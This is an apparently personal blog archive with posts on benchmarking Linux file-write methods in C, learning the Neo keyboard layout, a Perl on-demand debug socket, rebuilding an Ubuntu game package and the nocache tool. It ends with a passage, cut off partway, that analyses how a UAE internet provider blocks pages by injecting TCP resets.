Julius Plenz

So you want to write to a file real fast…

Or: A tale about Linux file write patterns.

So I once wrote a custom core dump handler to be used with Linux’s core_pattern. What it does is take a core dump on STDIN plus a few arguments, and then write the core to a predictable location on disk with a time stamp and suitable access rights. Core dumps tend to be rather large, and in general you don’t know in advance how much data you’ll write to disk. So I built in functionality that writes a chunk of data to disk (say, 16MB) and then checks with fstatfs() whether the disk still has more than a threshold of free capacity (say, 10GB). This way, a rapidly restarting and core-dumping application cannot cause “disk full” follow-up failures that will inevitably lead to a denial of service for most data handling services.

So… how do we write a lot of data to disk really fast? – Let us maybe rephrase the question: How do we write data to disk in the first place? Let’s assume we have already opened file descriptors in and out, and we just want to copy everything from in to out.

One might be tempted to try something like this:

ssize_t read_write(int in, int out)
{
    ssize_t n, t = 0;
    char buf[1024];
    while((n = read(in, buf, 1024)) > 0) {
        t += write(out, buf, n);
    }
    return t;
}

“But…!”, you cry out, “there’s so much wrong with this!” And you are right, of course:

Errors are not handled. If read() returns -1, the loop silently ends as if the input were finished, and the return value of write(), which may be -1 as well, is added to t unchecked. Either can happen because e.g. we have got a bad file descriptor, or because the syscall was interrupted.
A call to write(out, buf, n) will – if it does not return -1 – write at least one byte, but we have no guarantee that we will actually write all n bytes to disk. So we have to loop the write until we have written n bytes.

An updated and semantically correct pattern reads like this (in a real program you’d have to do real error handling instead of assertions, of course):

ssize_t read_write_bs(int in, int out, ssize_t bs)
{
    ssize_t w = 0, r = 0, t, n, m, c;

    char *buf = malloc(bs);
    assert(buf != NULL);

    t = filesize(in);

    while(r < t && (n = read(in, buf, bs))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        r += n; /* total bytes read so far */
        c = 0;  /* bytes of the current chunk already written */
        while(c < n && (m = write(out, buf + c, (n - c)))) {
            if(m == -1) { assert(errno == EINTR); continue; }
            c += m;
            w += m; /* total bytes written so far */
        }
    }

    free(buf);

    return w;
}

We have a total number of bytes to read (t), the number of bytes already read (r), and the number of bytes already written (w). Only when t == r == w are we done (or if the input stream ends prematurely). Error checking is performed so that we restart interrupted syscalls and crash on real errors.

What about the bs parameter? Of course you may have already noticed in the first example that we always copied 1024 bytes. Typically, a block on the file system is 4KB, so we are only writing quarter blocks, which is likely bad for performance. So we’ll try different block sizes and compare the results.

We can find out the file system’s block size like this (as usual, real error handling left out):

ssize_t block_size(int fd)
{
    struct statfs st;
    int rc = fstatfs(fd, &st); /* keep the call outside assert(): NDEBUG would remove it */
    assert(rc != -1);
    return (ssize_t) st.f_bsize;
}

OK, let’s do some benchmarks! (Full code is on GitHub.) For simplicity I’ll try things on my laptop computer with Ext3+dmcrypt and an SSD. This is “read a 128MB file and write it out”, repeated for different block sizes, timing each version three times and printing the best time in the first column. In parentheses you’ll see the percentage increase in comparison to the best run of all methods:
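For readers who want to reproduce the numbers, the measurement scheme (best of several runs, plus the percentage over the overall best) might look like the sketch below. It is not the benchmark code from GitHub; the names time_ms, best_of and percent_over are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <time.h>

/* Wall-clock duration of one call to fn(), in milliseconds. */
double time_ms(void (*fn)(void))
{
    struct timespec a, b;

    clock_gettime(CLOCK_MONOTONIC, &a);
    fn();
    clock_gettime(CLOCK_MONOTONIC, &b);

    return (b.tv_sec - a.tv_sec) * 1e3 + (b.tv_nsec - a.tv_nsec) / 1e6;
}

/* Best (smallest) of `runs` timings of fn(), in milliseconds. */
double best_of(void (*fn)(void), int runs)
{
    double best = -1.0;

    for (int i = 0; i < runs; i++) {
        double ms = time_ms(fn);
        if (best < 0.0 || ms < best)
            best = ms;
    }
    return best;
}

/* Percentage by which `ms` exceeds the overall best time `best`. */
double percent_over(double ms, double best)
{
    return (ms - best) / best * 100.0;
}
```

With the figures from the table below, percent_over(184, 164) comes out at roughly 12.2, which matches the value printed for the single-block run.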

read+write 16bs             164ms      191ms      206ms
read+write 256bs            167ms      168ms      187ms  (+ 1.8%)
read+write 4bs              169ms      169ms      177ms  (+ 3.0%)
read+write bs               184ms      191ms      200ms  (+ 12.2%)
read+write 1k               299ms      317ms      329ms  (+ 82.3%)

Mh. Seems like multiples of the FS’s block sizes don’t really matter here. In some runs, the 16x blocksize is best, sometimes it’s the 256x. The only obvious point is that writing only a single block at once is bad, and writing fractions of a block at once is very bad indeed performance-wise.

Now what’s there to improve? “Surely it’s the overhead of using read() to get data,” I hear you saying, “Use mmap() for that!” So we come up with this:

ssize_t mmap_write(int in, int out)
{
    ssize_t w = 0, n;
    size_t len;
    char *p;

    len = filesize(in);
    p = mmap(NULL, len, PROT_READ, MAP_SHARED, in, 0);
    assert(p != MAP_FAILED); /* mmap() signals failure with MAP_FAILED, not NULL */

    while(w < len && (n = write(out, p + w, (len - w)))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        w += n;
    }

    munmap(p, len);

    return w;
}

Admittedly, the pattern is simpler. But, alas, it is even a little bit slower! (YMMV)

read+write 16bs               167ms      171ms      209ms
mmap+write                    186ms      187ms      211ms  (+ 11.4%)

“Surely copying around useless data is hurting performance,” I hear you say, “it’s 2014, use zero-copy already!” – OK. So basically there are two approaches for this on Linux: splice(), which is cumbersome but rather old and known to work, and the new and shiny sendfile() interface.

For the splice approach, since either reader or writer of your splice call must be pipes (and in our case both are regular files), we need to create a pipe solely for the purpose of splicing data from in to the write end of the pipe, and then again splicing that same chunk from the read end to the out fd:

ssize_t pipe_splice(int in, int out)
{
    size_t bs = 65536;
    ssize_t w = 0, r = 0, t, n, m;
    int pipefd[2];
    int flags = SPLICE_F_MOVE | SPLICE_F_MORE;

    int rc = pipe(pipefd); /* keep the call outside assert(): NDEBUG would remove it */
    assert(rc != -1);

    t = filesize(in);

    while(r < t && (n = splice(in, NULL, pipefd[1], NULL, bs, flags))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        r += n;
        while(w < r && (m = splice(pipefd[0], NULL, out, NULL, bs, flags))) {
            if(m == -1) { assert(errno == EINTR); continue; }
            w += m;
        }
    }

    close(pipefd[0]);
    close(pipefd[1]);

    return w;
}

“This is not true zero copy!”, I hear you cry, and it’s true, the ‘page stealing’ mechanism has been discontinued as of 2007. So what we get is an “in-kernel memory copy”, but at least the file contents don’t cross the kernel/userspace boundary twice unnecessarily (we don’t inspect it anyway, right?).

The sendfile() approach is more immediate and clean:

ssize_t do_sendfile(int in, int out)
{
    ssize_t t = filesize(in);
    off_t ofs = 0;

    while(ofs < t) {
        if(sendfile(out, in, &ofs, t - ofs) == -1) {
            assert(errno == EINTR);
            continue;
        }
    }

    return t;
}

So… do we get an actual performance gain?

sendfile                    159ms      168ms      175ms
pipe+splice                 161ms      162ms      163ms  (+ 1.3%)
read+write 16bs             164ms      165ms      178ms  (+ 3.1%)

“Yes! I knew it!” you say. But I’m lying here. Every time I execute the benchmark, a different approach is the fastest. Sometimes the read/write approach comes in first, ahead of the two others. So it seems that this is not really a performance saver, is it? I like the sendfile() semantics, though. But beware:

In Linux kernels before 2.6.33, out_fd must refer to a socket. Since Linux 2.6.33 it can be any file. If it is a regular file, then sendfile() changes the file offset appropriately.

Strangely, sendfile() works on regular files in the default Debian Squeeze Kernel (2.6.32-5) without problems. (Update 2015-01-17: Przemysław Pawełczyk, who in 2011 sent Changli Gao’s patch which re-enables this behaviour to stable@kernel.org for inclusion in Linux 2.6.32, wrote to me explaining how exactly it ended up being backported. If you’re interested, see this excerpt from his email.)

“But,” I hear you saying, “the system has no clue what your intentions are, give it a few hints!” and you are probably right, that shouldn’t hurt:

void advice(int in, int out)
{
    ssize_t t = filesize(in);
    posix_fadvise(in, 0, t, POSIX_FADV_WILLNEED);
    posix_fadvise(in, 0, t, POSIX_FADV_SEQUENTIAL);
}

But since the file is very probably fully cached, the performance is not improved significantly. “BUT you should supply a hint on how much you will write, too!” – And you are right. And this is where the story branches off into two cases: Old and new file systems.

I’ll just tell the kernel that I want to write t bytes to disk now, and please reserve space (I don’t care about a “disk full” that I could catch and act on):

void do_falloc(int in, int out)
{
    ssize_t t = filesize(in);
    posix_fallocate(out, 0, t);
}

I’m using my workstation’s SSD with XFS now (not my laptop any more). Suddenly everything is much faster, so I’ll simply run the benchmarks on a 512MB file so that it actually takes time:

sendfile + advices + falloc            205ms      208ms      208ms
pipe+splice + advices + falloc         207ms      209ms      210ms  (+ 1.0%)
sendfile                               226ms      226ms      229ms  (+ 10.2%)
pipe+splice                            227ms      227ms      231ms  (+ 10.7%)
read+write 16bs + advices + falloc     235ms      240ms      240ms  (+ 14.6%)
read+write 16bs                        258ms      259ms      263ms  (+ 25.9%)

Wow, so this posix_fallocate() thing is a real improvement! It seems reasonable enough, of course: The file system can prepare a sequence of blocks of the requested size in advance, contiguous if possible. But wait! What about Ext3? Back to the laptop:

sendfile                               161ms      171ms      194ms
read+write 16bs                        164ms      174ms      189ms  (+ 1.9%)
pipe+splice                            167ms      170ms      178ms  (+ 3.7%)
read+write 16bs + advices + falloc     224ms      229ms      229ms  (+ 39.1%)
pipe+splice + advices + falloc         229ms      239ms      241ms  (+ 42.2%)
sendfile + advices + falloc            232ms      235ms      249ms  (+ 44.1%)

Bummer. That was unexpected. Why is that? Let’s check strace while we execute this program:

fallocate(1, 0, 0, 134217728)           = -1 EOPNOTSUPP (Operation not supported)
...
pwrite(1, "\0", 1, 4095)                = 1
pwrite(1, "\0", 1, 8191)                = 1
pwrite(1, "\0", 1, 12287)               = 1
pwrite(1, "\0", 1, 16383)               = 1
...

What? Who does this? – Glibc does this! It sees the syscall fail and re-creates the semantics by hand. (Beware, Glibc code follows. Safe to skip if you want to keep your sanity.)

/* Reserve storage for the data of the file associated with FD.  */
int
posix_fallocate (int fd, __off_t offset, __off_t len)
{
#ifdef __NR_fallocate
# ifndef __ASSUME_FALLOCATE
  if (__glibc_likely (__have_fallocate >= 0))
# endif
    {
      INTERNAL_SYSCALL_DECL (err);
      int res = INTERNAL_SYSCALL (fallocate, err, 6, fd, 0,
                                  __LONG_LONG_PAIR (offset >> 31, offset),
                                  __LONG_LONG_PAIR (len >> 31, len));

      if (! INTERNAL_SYSCALL_ERROR_P (res, err))
        return 0;

# ifndef __ASSUME_FALLOCATE
      if (__glibc_unlikely (INTERNAL_SYSCALL_ERRNO (res, err) == ENOSYS))
        __have_fallocate = -1;
      else
# endif
        if (INTERNAL_SYSCALL_ERRNO (res, err) != EOPNOTSUPP)
          return INTERNAL_SYSCALL_ERRNO (res, err);
    }
#endif

  return internal_fallocate (fd, offset, len);
}

And you guessed it, internal_fallocate() just does a one-byte pwrite() into every block (at its last byte, as the offsets 4095, 8191, … in the strace output show) until the space requirement is fulfilled. This is slowing things down considerably. This is bad. –

“But other people just truncate the file! I saw this!”, you interject, and again you are right.

void enlarge_truncate(int in, int out)
{
    ssize_t t = filesize(in);
    ftruncate(out, t);
}

Indeed the truncate versions work faster on Ext3:

pipe+splice + advices + trunc        157ms      158ms      160ms
read+write 16bs + advices + trunc    158ms      167ms      188ms  (+ 0.6%)
sendfile + advices + trunc           164ms      167ms      181ms  (+ 4.5%)
sendfile                             164ms      171ms      193ms  (+ 4.5%)
pipe+splice                          166ms      167ms      170ms  (+ 5.7%)
read+write 16bs                      178ms      185ms      185ms  (+ 13.4%)

Alas, not on XFS. There, the fallocate() system call is just more performant. (You can also use xfsctl directly for that.) –

And this is where the story ends.

In place of a sweeping conclusion, I’m a little bit disappointed that there seems to be no general semantics to say “I’ll write n bytes now, please be prepared”. Obviously, using posix_fallocate() on Ext3 hurts very much (this may be why cp is not employing it). So I guess the best solution is still something like this:

if(fallocate(out, 0, 0, len) == -1 && errno == EOPNOTSUPP)
    ftruncate(out, len);
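Wrapped into a self-contained function, the fragment above could look like this. It is only a sketch: the name reserve_space is an assumption, and any fallocate() error other than EOPNOTSUPP is simply passed on to the caller.

```c
#define _GNU_SOURCE         /* for fallocate() */
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: ask the file system to reserve `len` bytes for
 * `out`; where fallocate() is not supported, merely set the file size.
 * Returns 0 on success, -1 on error (errno is set). */
int reserve_space(int out, off_t len)
{
    if (fallocate(out, 0, 0, len) == 0)
        return 0;

    if (errno != EOPNOTSUPP)
        return -1;          /* e.g. ENOSPC: let the caller decide */

    return ftruncate(out, len);
}
```

Calling the fallocate() syscall wrapper directly, rather than posix_fallocate(), is what avoids the slow per-block emulation described above.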

Maybe you have another idea how to speed up the writing process? Then drop me an email, please.

Update 2014-05-03: Coming back after a couple of days’ vacation, I found the post was on HackerNews and generated some 23k hits here. I corrected the small mistake in example 2 (as pointed out in the comments – thanks!). – I trust that the diligent reader will have noticed that this is not a complete survey of either I/O hierarchy, file system and/or hard drive performance. It is, as the subtitle should have made clear, a “tale about Linux file write patterns”.

Update 2014-06-09: Sebastian pointed out an error in the mmap write pattern (the write should start at p + w, not at p). Also, the basic read/write pattern contained a subtle error. Tricky business – Thanks!

posted 2014-04-30 ∴ tagged linux and c

Switching to Neo

A year ago I started typing with the Neo layout instead of the US QWERTY layout I had used before. Guided by the experience reports of other people who switched, which I found very helpful and to whose list I hereby add my own, I kept a fairly regular log during the first days of my switch.

Day 1 (12 Aug): Wow, I feel completely helpless in front of my own computer. Every sentence I want to type takes me a minute or more. Entering passwords is a horror. Every key combination that is normally just “in my fingers” goes nowhere; in Vim in particular I get nothing done at all. I even break a few configs because I accidentally press the old “k” key, which is now “r” as in “replace”. I wrote a first email (but in Kiswahili, i.e. with atypical letter sequences) – everything is so exhausting!

Day 2 (13 Aug): With great effort I can by now operate tmux and Vim in a rudimentary way. The words trickle along, and some trigrams already come out quite fluently. When I am not at the computer, I sometimes unconsciously type words in my head; when I notice this, I make an effort to think in Neo. In theory I know at least the first two layers by heart, but sometimes I still have to think for several seconds before I can start typing. For the third layer I bring up the NeoLayoutViewer when needed. Every now and then my concentration suddenly collapses and I hit the same wrong key five times in a row until I pull myself together and think. – All in all, it is very much like learning a new language…

Day 3 (14 Aug): Everything goes a bit better and faster. Nothing works truly error-free. Today I spent an agonizingly slow session writing TeX for my bachelor’s thesis, and I have to say: I do not see the real advantage there – on a US layout the important special characters are at least as easy to reach… (Current speed: 63 keys per minute.)

Day 4 (15 Aug): Horror: seven hours at work, and I get nothing done, everything takes forever. No desire to write any more.

Day 5 (16 Aug): Another day of work. Somehow everything works, but it feels like I could type more confidently and faster two days ago…

Day 9 (21 Aug): After not spending much time at the computer over the weekend, I had to sit down to the bachelor’s thesis again at the start of the week. By now I am no longer quite so frustrated, and some words (even long ones) already flow really smoothly. It will work out. (By now about 120 KPM.)

Day 14 (26 Aug): Deadline: I had given myself until today to decide whether I want to keep typing Neo. I would not call the experiment “failed”, but at 140 keys per minute I am still far behind what I managed with QWERTY. Various di- and trigrams come very fluently by now, but I have the feeling that I somehow have to type every word a few times before I really know it. Tomorrow it gets serious, because I am running a training course and will have to type in front of a projector for two days…

Day 104 (23 Nov): The muscle memory has long been there: I can no longer remember where the keys used to be, and my fingers find their way quite naturally day after day. It feels like I rarely mistype, but at about 330 keystrokes per minute my typing speed is still only about 2/3 of what it was before the switch.

What I came to appreciate early on is the Mod4 key, which activates the fourth layer: there you can navigate with the cursor keys, jump to the beginning and the end of the line, and delete characters, all without moving your hands. I use this very often in Vim’s insert mode too, which is normally not considered “the pure doctrine”: with Neo, however, you do not have to move your hands and leave the home row, so it is much faster than switching modes twice. – And speaking of Vim: I would never have thought (and this was the only reason I had not learned Dvorak earlier) that Vim can be operated with completely rearranged keys. I often navigate with hjkl myself, even though those letters are arranged about as oddly as possible for that. You get used to everything. :-)

Day 372 (19 Aug): Almost exactly a year ago I switched, and by now I have regained my old typing speed of just under 470 keys per minute. That does not really look like progress, at least at first glance. However, I believe that overall I type faster, better and more ergonomically: I never look at the keyboard any more, and thanks to the Mod4 key I only have to move my fingers minimally for arrow keys, Backspace, Escape and similar sequences. All in all I am quite happy with my switch.

A few notes on learning:

As has been noted many times, the easiest way is to just “jump in” and type nothing but Neo. Yes, the first days are exhausting, but you leave this intermediate state fairly quickly and do not hang forever in the limbo of two systems. (It is the same effect as learning a new language from a book in your own country as opposed to simply speaking it on location.)
It makes sense to have the NeoLayoutViewer or a printout of the layout at hand, especially in the first days. When entering passwords in particular, you have no visual feedback!
Do not put stickers on the keys! Do not look at the keyboard! Ideally buy a new keyboard as well (a double adjustment is easier), or at least use one that is made for touch typing. (I had already been using Das Keyboard before.)

A few technical remarks on the Neo layout:

In my opinion it is a very good solution that characters which have different meanings in different contexts can also be typed in different ways. For example, when programming I type a dollar sign with Mod3+ö, that is, on the special-character layer. But when it comes to currency amounts, I stick to Shift+6, which sits next to the euro sign. I also usually type the hyphen via Mod3+d instead of using the one in the number row.
I type Neo only on US keyboards. At first this is rather unusual and error-prone, since the right Mod3 key for special characters sits directly above the Enter key. In IRC especially, I therefore often sent unfinished messages by accident at the beginning. On a German keyboard this is not unproblematic either, though. – In addition, there is no left Mod4 key, so I have not used the “numeric keypad” on that layer so far.
For layers 5 and 6 with Greek symbols I have not found any use so far. If I need them in LaTeX, I still type the full name, e.g. \alpha.

Finally, I would like to address a somewhat philosophical dimension of this switch. The sentence “Man gets used to everything” runs deeper than one might think. Within a few weeks I managed to carry out one of my central activities in a completely different way. That this is frustrating at the beginning (and these notes have reminded me quite clearly how annoyed I was) is of course to be expected. But where there is a will, there is a way.

Just as the arrangement of letters on the keyboard is fairly arbitrary, and you can switch from one arrangement to another because neither contains an inherent “truth” about letters and sentences, you can also switch languages, grammars and systems of thought. I, for example, now perceive the letters K and H as rather similar, because I type them with the same finger and have often mistyped them. Other people probably cannot relate to that, and objectively speaking my sense of similarity is absurd. And yet effects of language processing on the perception of reality can be observed.

I believe that precisely this overturning of certain principles that are believed to be fixed but are actually arbitrary is very important for not aging mentally so quickly. A few ideas:

Read books from cultures in which moral ground rules and forms of communication other than those of your own world dominate.
Learn a language that does not categorize nouns by gender.
Take a path other than the familiar one (physically or figuratively).
Use a completely new programming language for a small side project.
Try to express complex thoughts using only the 1,000 most-used words (help).
Use a non-Eurocentric map on which south points up (thoughts on this).

Or, in the words of aphorism no. 552 from Nietzsche’s Menschliches, Allzumenschliches I (Human, All Too Human I), titled Das einzige Menschenrecht (The only human right):

Whoever deviates from the customary is the victim of the extraordinary; whoever remains in the customary is its slave. In either case one is destroyed.

posted 2013-08-19 ∴ tagged neo, linux and life

An on demand Debugging Technique for long-running Processes

Debugging long-running processes or server software is usually an “either–or”: Either you activate debugging and have huge files that you rarely if ever look at, and they take up a considerable amount of disk space – or you did not activate the debugging mode and thus cannot get to the debugging output to figure out what the program is doing right now.

There is a really nice quick and dirty Non-invasive printf debugging technique that just does a printf on a non-existent file descriptor, so that you can view the messages by strace-ing the process and grepping for EBADF.
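The core of that trick fits into a few lines of C. The sketch below is an illustration, not code from the linked article; the helper name debug_trace is hypothetical, and -1 is used as a descriptor that can never be open.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: "print" a debug message to a descriptor that is
 * never open. The write() fails with EBADF and costs next to nothing,
 * but the message is still visible to anyone strace-ing the process. */
ssize_t debug_trace(const char *msg)
{
    return write(-1, msg, strlen(msg));
}
```

Attaching strace to the running process and grepping its output for EBADF then shows exactly these messages, without the program ever writing a log file.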

I want to share here a few Perl code snippets for an approach that is a little neater IMO, yet a little bit more invasive. Consider a simple “server” doing some work, occasionally printing out a debug statement:

#!/usr/bin/perl

use strict;
use warnings;

sub Debug { }; # empty for now

while(1) {
    Debug("Here I am!");
    select undef, undef, undef, 0.1;
}

The idea is now to create, on demand, a UNIX domain socket to which the process can write debug information, so that (possibly a few) other processes can read and print out the debug info received on that socket.

We introduce a “global” structure $DEBUG, and a function to initialize and destroy the socket, which is named debug-<pid-of-process> and placed in /tmp.

my $DEBUG = {
    socket => undef,
    conn => [],
    last_check => 0,
};

sub Debug_Init {
    use IO::Socket;
    use Readonly;
    Readonly my $SOCKET => "/tmp/debug-$$"; # Readonly's documented declaration form

    return if $DEBUG->{socket};

    unlink $SOCKET;
    my $s = IO::Socket::UNIX->new(
        Type => IO::Socket::SOCK_STREAM,
        Local => $SOCKET,
        Listen => 1,
    ) or die $!;
    $s->blocking(0);
    $DEBUG->{socket} = $s;
}

sub Debug_Cleanup {
    return unless $DEBUG->{socket};
    my $path = $DEBUG->{socket}->hostpath;
    undef $DEBUG->{socket};
    unlink $path;
}

When the process receives a SIGUSR1, we call Debug_Init, and to be sure we’ll clean up the socket in case of normal exit:

$SIG{USR1} = \&Debug_Init;
END { Debug_Cleanup; }

The socket is in non-blocking mode, so trying to accept() new connections will not block. Now, whenever we want to print out a debugging statement, we check if anyone has requested the debugging socket via SIGUSR1. After the first connection is accepted, we’ll only check once every second for new connections. For every accepted connection, we send the debugging message to that peer. (Note that UNIX domain sockets with Datagram type sadly do not support broadcast messaging – otherwise this would probably be easier.)

In case sending the message fails (probably because the peer disconnected), we’ll remove that connection from the list. If the last connection goes, we’ll unlink the socket.

sub Debug {
    return unless $DEBUG->{socket};
    my $s = $DEBUG->{socket};
    my $conn = $DEBUG->{conn};
    my $msg = shift or return;
    $msg .= "\n" unless $msg =~ /\n$/;

    if(time > $DEBUG->{last_check}) {
        while(my $c = $s->accept) {
            $c->shutdown(IO::Socket::SHUT_RD);
            push @$conn => $c;
        }
        $DEBUG->{last_check} = time if @$conn;
    }
    return unless @$conn;

    for(@$conn) {
        $_->send($msg, IO::Socket::MSG_NOSIGNAL) or undef $_;
    }
    @$conn = grep { defined } @$conn;

    unless(@$conn) {
        Debug_Cleanup();
    }
}

Here’s a simple script to display the debugging info for a given PID, assuming it uses the setup described above:

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $pid = shift;
if(not defined $pid) {
    print "usage: $0 <pid>\n";
    exit(1);
}

kill USR1 => $pid or die $!;

my $path = "/tmp/debug-$pid";
select undef, undef, undef, 0.01 until -e $path;

my $s = IO::Socket::UNIX->new(
    Type => IO::Socket::SOCK_STREAM,
    Peer => $path,
) or die $!;
$s->shutdown(IO::Socket::SHUT_WR);

$| = 1;
while($s->recv(my $m, 4096)) {
    print $m;
}

We can now start the server; no debugging happens. But as soon as we send a SIGUSR1 and attach to the (now present) debug socket, we can see the debug information:

$ perl server & ; sleep 10
[1] 19731

$ perl debug-process 19731
Here I am!
Here I am!
Here I am!
^C

When we hit Ctrl-C, the debug socket vanishes again.

In my opinion this is a really neat way to have a debugging infrastructure in place “just in case”.

posted 2013-07-13 ∴ tagged linux and perl

So your favourite game segfaults

I’m at home fixing some things on my mother’s new laptop, including upgrading to the latest Ubuntu. (Usually that’s a bad idea, but in this case it came with an update to LibreOffice which repaired the hang it previously encountered when opening any RTF file. Which was a somewhat urgent matter to solve.)

But, alas, one of the games (five-or-more, formerly glines) broke and now segfaults on startup. Happens to be the one game that she likes to play every day. What to do? The binary packages linked here don’t work.

Here’s how to roll your own: Get the essential development libraries and the ones specifically required for five-or-more, also the checkinstall tool.

apt-get install build-essential dpkg-dev checkinstall
apt-get build-dep five-or-more

Change to a temporary directory, get the source:

apt-get source five-or-more

Then apply the fix, configure and compile it:

./configure
make

But instead of doing a make install, simply use sudo checkinstall. This will build a pseudo Debian package, so that at least removing it will be easier in case an update will fix the issue.

How can this be difficult to fix?! *grr*

posted 2013-06-14 ∴ tagged linux, ubuntu and rant

“nocache” in Debian Testing

I’m very pleased to announce that a little program of mine called nocache has officially made it into the Debian distribution and migrated to Debian testing just a few days ago.

The tool started out as a small hack that employs mmap and mincore to check which blocks of a file are already in the Linux FS cache, and uses this info in the intercepted libc’s open/close syscall wrappers and related functions in an effort to restore the cache to its pristine state after every file access.
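The mmap/mincore check at the heart of this idea can be sketched in a few lines. This is not nocache’s actual code, only a minimal illustration; the function name cached_pages is hypothetical, and on some kernels mincore() may report less precise residency information for files the caller does not own.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: count how many pages of the file behind fd are
 * currently resident in the page cache. Returns -1 on error. */
long cached_pages(int fd)
{
    struct stat st;
    long pagesize, n = -1;
    size_t len, pages, i;
    unsigned char *vec;
    void *p;

    if (fstat(fd, &st) == -1)
        return -1;
    if (st.st_size == 0)
        return 0;               /* nothing to map */

    pagesize = sysconf(_SC_PAGESIZE);
    len = (size_t) st.st_size;
    pages = (len + (size_t) pagesize - 1) / (size_t) pagesize;

    /* Mapping the file does not read it; it only gives mincore()
     * an address range to inspect. */
    p = mmap(NULL, len, PROT_READ, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED)
        return -1;

    vec = malloc(pages);
    if (vec != NULL && mincore(p, len, vec) == 0) {
        n = 0;
        for (i = 0; i < pages; i++)
            n += vec[i] & 1;    /* lowest bit set: page is resident */
    }

    free(vec);
    munmap(p, len);
    return n;
}
```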

I only wrote this tool as a little “proof of concept”, but it seems there are people out there actually using this, which is nice.

A couple of links:

My thanks go out to Dmitry who packaged and will be maintaining the tool for Debian – as well as the other people who engaged in the lively discussions in the issue tracker.

Update: Chris promptly provided an Arch Linux package, too! Thanks!

posted 2013-05-19 ∴ tagged linux and debian

Internet Censorship in Dubai and the UAE

The internet is censored in the UAE. Not really bad like in China – it’s rather used to restrict access to “immoral content”. Because you know, the internet is full of porn and Danish people making fun of The Prophet. – Also, downloading Skype is forbidden (but using it is not).

I have investigated the censorship mechanism of one of the two big providers and will describe the techniques in use and how to effectively circumvent the block.

How it works

If you navigate to a “forbidden page” in the UAE, you’ll be presented with a screen warning you that it is illegal under the Internet Access Management Regulatory Policy to view that page.

This is actually implemented in a pretty rudimentary, yet effective way (if you have no clue how TCP/IP works). If a request to a forbidden resource is made, the connection is immediately shut down by the proxy. In the shutdown packet, an <iframe> code is placed that displays the image:

<iframe src="http://94.201.7.202:8080/webadmin/deny/index.php?dpid=20&
  dpruleid=7&cat=105&ttl=0&groupname=Du_Public_IP_Address&policyname=default&
  username=94.XX.0.0&userip=94.XX.XX.XX&connectionip=1.0.0.127&
  nsphostname=YYYYYYYYYY.du.ae&protocol=nsef&dplanguage=-&url=http%3a%2f%2f
  pastehtml%2ecom%2fview%2fc336prjrl%2ertxt"
  width="100%" height="100%" frameborder=0></iframe>

Capturing the TCP packets while making a forbidden request – in this case: a list of banned URLs in the UAE, which itself is banned – reveals one crucial thing: The GET request actually reaches the web server, but before the answer arrives, the proxy has already sent the Reset-Connection-Packets. (Naturally, that is much faster, because it is physically closer.)

Because the client thinks the connection is closed, it will itself send out Reset-Packets to the Webserver in reply to its packets containing the reply (“the webpage”). This actually shuts down the connection in both directions. All of this happens on the TCP level, thus by “client” I mean the operating system. The client application just opens a TCP socket and sees it closed via the result code coming from the OS.

You can see the initial reset-packets from the proxy as entries 5 and 6 in the list; the later RST packets originate from my computer because the TCP stack considers the connection closed.

How to circumvent it

First, we need to find out at which point our HTTP connection is being hijacked. To do this, we search for the characteristic TCP packet with the FIN, PSH, ACK bits set, while making a request that is blocked. The output will be something like:

$ sudo tcpdump -v "tcp[13] = 0x019"
18:38:35.368715 IP (tos 0x0, ttl 57, ... proto TCP (6), length 522)
    host-88-80-29-58.cust.prq.se.http > 192.168.40.73.37630: Flags [FP.], ...
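The filter compares byte 13 of the TCP header, which holds the flag bits, against 0x019 (the same value as 0x19). Here is a minimal C sketch of where that number comes from. The constant and function names are made up for this example; the bit values are the standard TCP flag bits.

```c
#include <stdint.h>

/* TCP flag bits as they appear in byte 13 of the TCP header */
enum {
    TCP_FLAG_FIN = 0x01,
    TCP_FLAG_SYN = 0x02,
    TCP_FLAG_RST = 0x04,
    TCP_FLAG_PSH = 0x08,
    TCP_FLAG_ACK = 0x10
};

/* Returns 1 if exactly FIN, PSH and ACK are set, like "tcp[13] = 0x19". */
int is_fin_psh_ack(uint8_t flags)
{
    return flags == (TCP_FLAG_FIN | TCP_FLAG_PSH | TCP_FLAG_ACK);
}
```

Note that the comparison is for equality, so a packet that carries additional flags would not match.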

We are only interested in the TTL of the FIN-PSH-ACK packets: By subtracting this from the default TTL of 64 (which the provider seems to be using), we get the number of hops the host is away. Looking at a traceroute we see that obviously, the host that is 64 - 57 = 7 hops away is located at the local ISP. (Never mind the un-routable 10.* appearing in the traceroute. Seeing this was the initial reason for me to think these guys are not too proficient in network technology, no offense.)

$ mtr --report --report-wide --report-cycles=1 pastehtml.com
HOST: mjanja                         Loss%   Snt   Last   Avg  Best  Wrst StDev
  1.|-- 192.168.40.1                  0.0%     1    2.9   2.9   2.9   2.9   0.0
  2.|-- 94.XX.XX.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  3.|-- 10.XXX.0.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  4.|-- 10.XXX.0.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  5.|-- 10.100.35.78                  0.0%     1    6.8   6.8   6.8   6.8   0.0
  6.|-- 94.201.0.2                    0.0%     1    7.7   7.7   7.7   7.7   0.0
  7.|-- 94.201.0.25                   0.0%     1    8.4   8.4   8.4   8.4   0.0
  8.|-- 195.229.27.85                 0.0%     1   11.1  11.1  11.1  11.1   0.0
  9.|-- csk012.emirates.net.ae        0.0%     1   27.3  27.3  27.3  27.3   0.0
 10.|-- 195.229.3.215                 0.0%     1  146.6 146.6 146.6 146.6   0.0
 11.|-- decix-ge-2-7.i2b.se           0.0%     1  156.2 156.2 156.2 156.2   0.0
 12.|-- sth-cty1-crdn-1-po1.i2b.se    0.0%     1  164.7 164.7 164.7 164.7   0.0
 13.|-- 178.16.212.57                 0.0%     1  151.6 151.6 151.6 151.6   0.0
 14.|-- cust-prq-nt.i2b.se            0.0%     1  157.5 157.5 157.5 157.5   0.0
 15.|-- tunnel3.prq.se                0.0%     1  161.5 161.5 161.5 161.5   0.0
